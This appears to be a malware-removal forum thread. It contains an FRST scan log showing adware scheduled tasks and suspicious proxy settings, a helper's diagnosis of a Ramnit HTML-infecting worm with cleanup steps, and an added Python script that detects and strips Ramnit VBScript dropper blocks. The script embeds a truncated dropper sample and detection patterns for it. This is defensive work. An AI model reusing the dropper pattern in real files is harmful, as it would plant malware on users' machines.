Task: {9387EA93-54F1-4BB0-9F7A-E9C3DA13AC12} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-7 => C:\Program Files\SavePass\SavePass-nova.exe
Task: {975A1218-C56A-49DE-8EE8-84180F098A16} - System32\Tasks\{7ED4128B-966D-4B70-9E5D-182A05C6CCF4} => Chrome.exe http://ui.skype.com/ui/0/6.11.0.102/en/go/help.faq.installer?LastError=1638
Task: {992238EF-0B17-4631-A262-77517E0F1091} - System32\Tasks\{C3B129DF-3BCD-4C63-83C0-0B001AC8E8C8} => Chrome.exe http://ui.skype.com/ui/0/6.11.0.102/en/go/help.faq.installer?LastError=1638
Task: {9C2F5841-E3D1-4EFB-84B0-68B60F5C5292} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-7 => C:\Program Files\HD-V1.9\HD-V1.9-nova.exe <==== ATTENTION
Task: {A2264811-E7DC-4C59-99D2-39C2E2C81508} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-2 => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-2.exe
Task: {AE679B3F-752A-4259-902F-9BBBCA70FE8B} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5_user => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-5.exe
Task: {AFFDF1FD-7370-423D-A8B2-88CB846ECAE2} - System32\Tasks\{9A279C7D-03AB-4B29-8FD7-28C8ADD5CE4D} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1638
Task: {BF64A047-C491-4315-A418-CF2ED1FF937A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-07-23] (Piriform Ltd)
Task: {DD6C9195-F537-44F8-8EBE-D39DE85DDCB5} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-4 => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-4.exe
Task: {DEFD6723-2CEA-4C7C-9121-7DED1FAD301E} - System32\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-11 => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-11.exe <==== ATTENTION
Task: {E3FFFB8B-6A51-448C-BC99-8E86847EB9E9} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-10 => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-10.exe
Task: {E9AF7E85-2F5D-4F56-931B-C2AB7E1E9CC7} - System32\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5 => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-5.exe
Task: {EBEBBA2B-AB14-44E8-B131-92E34AC3E2F3} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {EDEC679B-5755-4CF1-B172-257318B97B63} - System32\Tasks\{E2AC0E2A-FABC-464C-9FAF-E7C3378F827F} => Chrome.exe http://ui.skype.com/ui/0/6.10.0.104/en/go/help.faq.installer?LastError=1638
Task: {FABC2E39-07DC-4848-8C80-40D84163C69F} - System32\Tasks\{A1C8EB35-0EFC-41B7-87AB-48F00D51AA70} => Chrome.exe http://ui.skype.com/ui/0/6.10.0.104/en/go/help.faq.installer?LastError=1638
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-1.job => C:\Program Files\SavePass\SavePass-codedownloader.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-10.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-10.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-11.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-11.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-2.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-2.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-4.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-4.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-5.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5_user.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-5.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-6.job => C:\Program Files\SavePass\SavePass-novainstaller.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-7.job => C:\Program Files\SavePass\SavePass-nova.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-1.job => C:\Program Files\HD-V1.9\HD-V1.9-codedownloader.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-10.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-11.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-2.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-2.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-4.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5_user.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-6.job => C:\Program Files\HD-V1.9\HD-V1.9-novainstaller.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-7.job => C:\Program Files\HD-V1.9\HD-V1.9-nova.exe <==== ATTENTION
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\SDMsgUpdate (SD).job => C:\Program Files\SmartDraw 2013\Messages\SDNotify.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-04-23 16:05 - 2014-04-23 16:05 - 00073544 ____N () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-04-23 16:04 - 2014-04-23 16:04 - 01044808 ____N () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2013-11-24 12:48 - 2013-11-24 12:48 - 00065264 ____N () C:\Program Files\TortoiseSVN\bin\TortoiseStub32.dll
2013-11-24 12:48 - 2013-11-24 12:48 - 00071408 ____N () C:\Program Files\TortoiseSVN\bin\libsasl32.dll
2014-07-31 21:07 - 2014-07-31 21:07 - 00035328 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
2014-05-24 22:26 - 2014-05-24 22:26 - 00091648 _____ () C:\Program Files\FileZilla FTP Client\libgcc_s_sjlj-1.dll
2014-05-24 22:26 - 2014-05-24 22:26 - 00892416 _____ () C:\Program Files\FileZilla FTP Client\libstdc++-6.dll
2014-08-01 11:47 - 2011-05-28 22:04 - 00140288 _____ () C:\Program Files\WinRAR\rarext.dll
2014-05-12 15:34 - 2014-05-12 15:34 - 00260608 _____ () C:\Program Files\Notepad++\NppShell_06.dll
2013-03-07 11:08 - 2012-12-04 15:25 - 00137216 ____N () C:\Program Files\PostgreSQL\9.2\bin\LIBPQ.dll
2013-03-07 11:09 - 2012-08-14 19:15 - 01009664 ____N () C:\Program Files\PostgreSQL\9.2\bin\libxml2.dll
2013-09-10 16:18 - 2011-01-07 23:14 - 00464172 ____N () D:\wamp\bin\apache\apache2.2.17\bin\LIBPQ.dll
2014-08-01 17:57 - 2014-08-01 17:56 - 00159768 _____ () C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\loggingserver.exe
2014-08-01 17:57 - 2014-08-01 17:56 - 00519704 _____ () C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\log4cplusU.dll
2014-08-01 17:57 - 2014-08-01 17:56 - 02575384 _____ () C:\Program Files\AVG Web TuneUp\vprot.exe
2013-05-17 10:43 - 2014-07-30 15:18 - 03547136 ____N () C:\Program Files\Free Download Manager\fdmbtsupp.dll
2013-10-09 18:37 - 2013-06-08 21:29 - 02926848 ____N () C:\Windows\wweb32.dll
2014-06-26 20:17 - 2014-06-26 20:17 - 17381826 ____N () C:\Program Files\ownCloud\owncloud.exe
2014-06-20 11:04 - 2014-06-20 11:04 - 01980622 ____N () C:\Program Files\ownCloud\icui18n51.dll
2014-06-20 11:04 - 2014-06-20 11:04 - 01265668 ____N () C:\Program Files\ownCloud\icuuc51.dll
2014-06-20 11:04 - 2014-06-20 11:04 - 22328477 ____N () C:\Program Files\ownCloud\icudata51.dll
2014-06-20 13:44 - 2014-06-20 13:44 - 00095268 ____N () C:\Program Files\ownCloud\libgcc_s_sjlj-1.dll
2014-06-20 13:44 - 2014-06-20 13:44 - 00846908 ____N () C:\Program Files\ownCloud\libstdc++-6.dll
2014-06-20 10:57 - 2014-06-20 10:57 - 00144011 ____N () C:\Program Files\ownCloud\libpcre16-0.dll
2014-06-20 10:57 - 2014-06-20 10:57 - 00083490 ____N () C:\Program Files\ownCloud\zlib1.dll
2014-06-20 10:58 - 2014-06-20 10:58 - 01345107 ____N () C:\Program Files\ownCloud\libGLESv2.dll
2014-06-20 10:58 - 2014-06-20 10:58 - 00203045 ____N () C:\Program Files\ownCloud\libpng16-16.dll
2014-06-26 20:16 - 2014-06-26 20:16 - 16697801 ____N () C:\Program Files\ownCloud\libowncloudsync.dll
2014-06-26 20:16 - 2014-06-26 20:16 - 00777549 ____N () C:\Program Files\ownCloud\libocsync.dll
2014-06-26 14:32 - 2014-06-26 14:32 - 00157526 ____N () C:\Program Files\ownCloud\libneon-27.dll
2014-06-17 10:04 - 2014-06-17 10:04 - 00169101 ____N () C:\Program Files\ownCloud\libproxy.dll
2014-06-17 10:01 - 2014-06-17 10:01 - 00041592 ____N () C:\Program Files\ownCloud\libmodman.dll
2014-06-20 11:03 - 2014-06-20 11:03 - 01150462 ____N () C:\Program Files\ownCloud\libxml2-2.dll
2013-09-24 11:00 - 2013-09-24 11:00 - 00566268 ____N () C:\Program Files\ownCloud\libsqlite3-0.dll
2014-06-20 10:58 - 2014-06-20 10:58 - 00150394 ____N () C:\Program Files\ownCloud\libEGL.dll
2014-06-20 10:59 - 2014-06-20 10:59 - 00196540 ____N () C:\Program Files\ownCloud\libjpeg-8.dll
2014-06-20 11:07 - 2014-06-20 11:07 - 00246506 ____N () C:\Program Files\ownCloud\libwebp-4.dll
2014-06-20 11:58 - 2014-06-20 11:58 - 00228133 ____N () C:\Program Files\ownCloud\libxslt-1.dll
2014-06-17 11:44 - 2014-06-17 11:44 - 00059083 ____N () C:\Program Files\ownCloud\libqt5keychain.dll
2014-06-20 13:16 - 2014-06-20 13:16 - 00637003 ____N () C:\Program Files\ownCloud\platforms\qwindows.dll
2014-06-20 13:16 - 2014-06-20 13:16 - 00032046 ____N () C:\Program Files\ownCloud\imageformats\qgif.dll
2014-06-20 13:16 - 2014-06-20 13:16 - 00033454 ____N () C:\Program Files\ownCloud\imageformats\qico.dll
2014-06-20 13:16 - 2014-06-20 13:16 - 00047735 ____N () C:\Program Files\ownCloud\imageformats\qjpeg.dll
2014-06-20 13:16 - 2014-06-20 13:16 - 00060152 ____N () C:\Program Files\ownCloud\sqldrivers\qsqlite.dll
2014-08-04 13:43 - 2014-08-04 13:43 - 00043008 _____ () c:\users\user\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpc7plhn.dll
2013-10-19 05:40 - 2014-07-30 15:19 - 25100288 ____N () C:\Users\User\AppData\Roaming\Dropbox\bin\libcef.dll
2014-07-21 14:17 - 2014-07-21 14:17 - 00436576 ____N () C:\Program Files\Evernote\Evernote\libxml2.dll
2014-07-21 14:17 - 2014-07-21 14:17 - 00318304 ____N () C:\Program Files\Evernote\Evernote\libtidy.dll
2011-06-06 00:39 - 2010-12-31 21:24 - 08133120 ____N () D:\wamp\bin\mysql\mysql5.5.8\bin\mysqld.exe
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\User\.DS_Store:AFP_AfpInfo
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\98891617.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\98891617.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeBridge => "C:\Program Files\Adobe\Adobe Bridge CS5\Bridge.exe" -stealth
MSCONFIG\startupreg: Facebook Update => "C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
MSCONFIG\startupreg: googletalk => C:\Users\User\AppData\Roaming\Google\Google Talk\googletalk.exe /autostart
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Messenger (Yahoo!) => "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
MSCONFIG\startupreg: NeroFilterCheck => C:\Windows\system32\NeroCheck.exe
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files\QuickTime\QTTask.exe" -atboottime
 
==================== Faulty Device Manager Devices =============
 
Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/04/2014 01:50:48 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816"1".
Dependent Assembly Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/04/2014 01:50:07 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST.exe version 2.8.2014.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1e70
 
Start Time: 01cfafba4833b0a7
 
Termination Time: 14
 
Application Path: E:\Myfiles and backup\svchost remover\FRST.exe
 
Report Id:
 
Error: (08/04/2014 01:47:24 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816"1".
Dependent Assembly Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/04/2014 01:45:04 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816"1".
Dependent Assembly Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/04/2014 01:43:59 PM) (Source: MSSQLSERVER) (EventID: 17207) (User: )
Description: FileMgr::StartLogFiles: Operating system error 2(failed to retrieve text for this error. Reason: 15105) occurred while creating or opening file 'C:\Downloads\onlineexam-14819\OnlineExam\App_Data\OnlineExam_log.LDF'. Diagnose and correct the operating system error, and retry the operation.
 
Error: (08/04/2014 01:43:59 PM) (Source: MSSQLSERVER) (EventID: 17207) (User: )
Description: FileMgr::StartLogFiles: Operating system error 2(failed to retrieve text for this error. Reason: 15105) occurred while creating or opening file 'C:\Downloads\AdventureWorks2008_Database\AdventureWorks2008_Log.ldf'. Diagnose and correct the operating system error, and retry the operation.
 
Error: (08/04/2014 01:43:59 PM) (Source: MSSQLSERVER) (EventID: 17207) (User: )
Description: FileMgr::StartLogFiles: Operating system error 2(failed to retrieve text for this error. Reason: 15105) occurred while creating or opening file 'E:\FinalYearProject\eLearning\eLearning\App_Data\eLearning_log.ldf'. Diagnose and correct the operating system error, and retry the operation.
 
Error: (08/04/2014 01:43:59 PM) (Source: MSSQLSERVER) (EventID: 17207) (User: )
Description: FileMgr::StartLogFiles: Operating system error 2(failed to retrieve text for this error. Reason: 15105) occurred while creating or opening file 'E:\RubimDB\college\MvcFormsAuthenticationSample--\MvcFormsAuthenticationSample\App_Data\userDb_log.ldf'. Diagnose and correct the operating system error, and retry the operation.
 
Error: (08/04/2014 01:43:59 PM) (Source: MSSQLSERVER) (EventID: 17204) (User: )
Description: FCB::Open failed: Could not open file C:\Downloads\onlineexam-14819\OnlineExam\App_Data\OnlineExam.mdf for file number 1.  OS error: 3(failed to retrieve text for this error. Reason: 15105).
 
Error: (08/04/2014 01:43:58 PM) (Source: MSSQLSERVER) (EventID: 17204) (User: )
Description: FCB::Open failed: Could not open file E:\RubimDB\college\MvcFormsAuthenticationSample--\MvcFormsAuthenticationSample\App_Data\userDb.mdf for file number 1.  OS error: 3(failed to retrieve text for this error. Reason: 15105).
 
 
System errors:
=============
Error: (08/04/2014 01:44:41 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
cdrom
 
Error: (08/04/2014 01:42:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Mongo DB service failed to start due to the following error: 
%%1053
 
Error: (08/04/2014 01:42:03 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Mongo DB service to connect.
 
Error: (08/04/2014 09:28:32 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
cdrom
 
Error: (08/04/2014 09:27:16 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Mongo DB service failed to start due to the following error: 
%%1053
 
Error: (08/04/2014 09:27:16 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Mongo DB service to connect.
 
Error: (08/03/2014 11:15:50 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
cdrom
 
Error: (08/03/2014 11:13:46 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Mongo DB service failed to start due to the following error: 
%%1053
 
Error: (08/03/2014 11:13:46 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Mongo DB service to connect.
 
Error: (08/01/2014 05:59:26 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The AVG WatchDog service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 0 milliseconds: Restart the service.
 
 
Microsoft Office Sessions:
=========================
Error: (07/04/2014 04:49:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 1127 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (07/04/2014 04:25:24 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 92 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (07/04/2014 04:23:36 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 642 seconds with 60 seconds of active time.  This session ended with a crash.
 
As I said earlier, the scan process doesn't go ahead of it (Office sessions), so would you like me to uninstall/remove the Office package and try the FRST scan recovery tool again?


#5 jsutbee

jsutbee
  • Topic Starter

  • Members
  • 21 posts

Posted 04 August 2014 - 04:10 AM

Sorry to bother you again. I thought AVG was healing all my HTML files that got infected before, but instead it was removing/deleting them from my PC :(. Whenever I try to open a folder containing HTML files, it detects a virus as "virus found VBS/Heur" and suggests that I remove it. I can't open those files and check anything inside them in any of my IDEs (Sublime/Notepad++).



#6 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,079 posts

Posted 04 August 2014 - 11:14 AM

Hi jsutbee,
 
Your HTML files are infected by a worm called Ramnit.
 
I'm afraid I have very bad news.

Win32/Ramnit.A is a file infector with IRCBot functionality which infects .exe and .HTML/HTM files, and opens a back door that compromises your computer. Using this backdoor, a remote attacker can access and instruct the infected computer to download and execute more malicious files. The infected .HTML or .HTM files may be detected as Virus:VBS/Ramnit.A. Win32/Ramnit.A!dll is a related file infector often seen with this infection. It too has IRCBot functionality which infects .exe, .dll and .HTML/HTM files and opens a back door that compromises your computer. This component is injected into the default web browser by Worm:Win32/Ramnit.A, which is dropped by a Ramnit-infected executable file.
 
Ramnit is commonly spread via a flash drive (usb, pen, thumb, jump) infection where it copies Worm:Win32/Ramnit.A with a random file name. The infection is often contracted by visiting remote crack and keygen sites. These types of sites are infested with a smörgåsbord of malware and are a major source of system infection.
 
It would be quicker and easier to reformat, but I'm willing to help you try and clean the infection. There are no guarantees, and it's possible that your computer could become unbootable or become reinfected later on.
 
--------------
 
If you wish to clean then follow the rest of this post:
 
Have you set these proxies yourself?:
ProxyServer: 133.242.131.152:443
FF NetworkProxy: "http", "125.195.133.102"
FF NetworkProxy: "http_port", 808
 
--------------

We need to remove some programs with Revo Uninstaller Free:
 
Note: Revo Uninstaller is more thorough in deleting programs on your computer than using the Add/Remove option in Windows. Since it is a more powerful tool, please be sure to follow the instructions carefully.
Note: If the program you want to uninstall is not listed by Revo, let me know and we will try an alternate method of removal.

  • Please download and install Revo Uninstaller Free
    note: there is no need to click anything on that page, the download will start automatically
  • Double click Revo Uninstaller to run it
  • From the list of programs double click on the listed program(s), or anything similar, to remove it:
McAfee Security Scan Plus
Media Buzz
Media Player
Media View
Media Viewer
Media Watch
Network System Driver
Rich Media View
Video Player
Webexp Enhanced
  • When prompted if you want to uninstall click Yes
  • Be sure the Moderate option is selected then click Next
  • The program will run, If prompted again click Yes
  • When the built-in uninstaller is finished click on Next
  • Once the program has searched for leftovers click Next
  • Check the items in bold only on the list then click Delete
    note: you may have to expand some folders by clicking the "+" mark
  • When prompted click on Yes and then on Next
  • Put a check on any folders that are found and select Delete
  • When prompted select Yes then Next
  • Once done click Finish

--------------
 
Running Combofix:

Download Combofix from this link and save it to your desktop

  • Close any open browsers or any other programs that are open.
  • Double click on combofix.exe & follow the prompts.
  • When finished, it will produce a report for you.
  • You can also find the log here: C:\ComboFix.txt

Please also note:

  • Do not click combofix's window while it's running. That may cause combofix to stall.
  • Combofix may reboot your computer a number of times, this is normal.
  • If you receive an error, "Illegal operation attempted on a registry key that has been marked for deletion,"  then please restart the computer to resolve this.

--------------

To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • ComboFix.txt

xXToffeeXx~


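The Ramnit HTML infection described above appends a VBScript block to each .htm/.html file that rebuilds the dropped svchost.exe from a hex string and writes it out with Scripting.FileSystemObject; AVG deletes the whole file rather than stripping that block. The script below is an added example (not from the poster or from any removal tool) that flags such files and strips only the injected block so the original page content can be kept; the sample infected page and the benign VBScript page are constructed for the demonstration. Cleaning the HTML files does not disinfect the machine: the infected executables and the backdoor still have to be dealt with as described in this post.

```python
"""Detect and strip Ramnit-style VBScript dropper blocks from HTML files."""
import re
from pathlib import Path
from typing import Dict, List, Tuple

# A VBScript <SCRIPT ...> ... </SCRIPT> element, matched case-insensitively
# across lines (the injected block is appended after the closing </html>).
SCRIPT_BLOCK = re.compile(
    r"<script[^>]*language\s*=\s*[\"']?vbscript[\"']?[^>]*>.*?</script>",
    re.IGNORECASE | re.DOTALL,
)

# Traits of the dropper block: a drop file name, a hex payload that starts
# with the PE "MZ" header (4D5A), and FileSystemObject to write it to disk.
DROPPER_MARKERS = (
    re.compile(r"DropFileName\s*=", re.IGNORECASE),
    re.compile(r'WriteData\s*=\s*"4D5A', re.IGNORECASE),
    re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)', re.IGNORECASE),
)


def find_dropper_blocks(html: str) -> List[Tuple[int, int]]:
    """Return (start, end) spans of VBScript blocks that look like the dropper.

    A block is flagged only when at least two markers match, so an ordinary
    VBScript block on an old intranet page is not treated as infected.
    """
    spans = []
    for match in SCRIPT_BLOCK.finditer(html):
        body = match.group(0)
        hits = sum(1 for marker in DROPPER_MARKERS if marker.search(body))
        if hits >= 2:
            spans.append((match.start(), match.end()))
    return spans


def is_infected(html: str) -> bool:
    """True when the page carries at least one dropper block."""
    return bool(find_dropper_blocks(html))


def clean_html(html: str) -> Tuple[str, int]:
    """Remove every flagged block; return (cleaned html, number removed)."""
    spans = find_dropper_blocks(html)
    if not spans:
        return html, 0
    pieces, last = [], 0
    for start, end in spans:
        pieces.append(html[last:start])
        last = end
    pieces.append(html[last:])
    return "".join(pieces), len(spans)


def scan_directory(root: str, fix: bool = False,
                   backup_suffix: str = ".ramnit.bak") -> Dict[str, int]:
    """Walk root, report infected .htm/.html files, optionally clean in place.

    Files are decoded as latin-1 so every byte round-trips unchanged; when
    fix=True the original file is kept next to the cleaned one as a backup.
    """
    results: Dict[str, int] = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in (".htm", ".html"):
            continue
        raw = path.read_bytes()
        cleaned, removed = clean_html(raw.decode("latin-1"))
        if removed:
            results[str(path)] = removed
            if fix:
                path.with_name(path.name + backup_suffix).write_bytes(raw)
                path.write_bytes(cleaned.encode("latin-1"))
    return results


# Constructed samples: a clean page, a page with a truncated dropper block
# appended (payload cut after the MZ header), and a benign VBScript page.
SAMPLE_CLEAN = "<html><body><p>hello</p></body></html>\n"
SAMPLE_INFECTED = """<html><head><title>report</title></head>
<body><p>quarterly numbers</p></body></html>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
--></SCRIPT>"""
BENIGN_VBSCRIPT = '<html><body><script language="VBScript">MsgBox "hi"</script></body></html>'

if __name__ == "__main__":
    import sys
    fix = "--fix" in sys.argv
    root = next((a for a in sys.argv[1:] if not a.startswith("--")), ".")
    for name, count in scan_directory(root, fix=fix).items():
        print(f"{name}: {count} dropper block(s) {'removed' if fix else 'found'}")
```

Run it as `python clean_ramnit_html.py D:\sites` to list infected pages, and add `--fix` to strip the blocks and keep `.ramnit.bak` copies.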


#7 jsutbee

jsutbee
  • Topic Starter

  • Members
  • 21 posts

Posted 05 August 2014 - 01:14 AM

Hi Toffee,

As per your suggestion, I successfully installed Revo Uninstaller and removed all the programs that you listed above:

McAfee Security Scan Plus
Media Buzz
Media Player
Media View
Media Viewer
Media Watch
Network System Driver
Rich Media View
Video Player
Webexp Enhanced
Then I installed ComboFix and went through it as per your instructions. But in the first run, it restarted my PC and got stuck on the same screen for more than an hour. Then I closed it and ran it again, and the second time it worked and generated the log (combofix.txt) as follows.

Combofix.txt
ComboFix 14-08-05.01 - User 5/2014 Tue  11:28:00.2.2 - x86
